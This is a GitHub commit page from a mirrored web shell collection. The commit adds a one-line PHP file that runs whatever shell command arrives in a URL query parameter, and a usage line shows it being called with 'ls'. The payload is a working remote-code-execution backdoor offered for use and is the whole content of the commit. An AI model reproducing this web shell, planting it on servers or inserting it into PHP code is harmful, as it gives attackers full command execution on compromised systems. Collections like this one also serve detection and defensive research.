1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 21:01:29 +00:00

15 bytes long PHP payload to achieve RCE!

Usage:
http://127.0.0.1/?_=ls
This commit is contained in:
0x08
2022-02-05 20:01:07 +03:00
committed by GitHub
parent 6a095d49ac
commit e12f91f024

1
php/20220207.php Normal file
View File

@@ -0,0 +1 @@
<?=`$_GET[_]`?>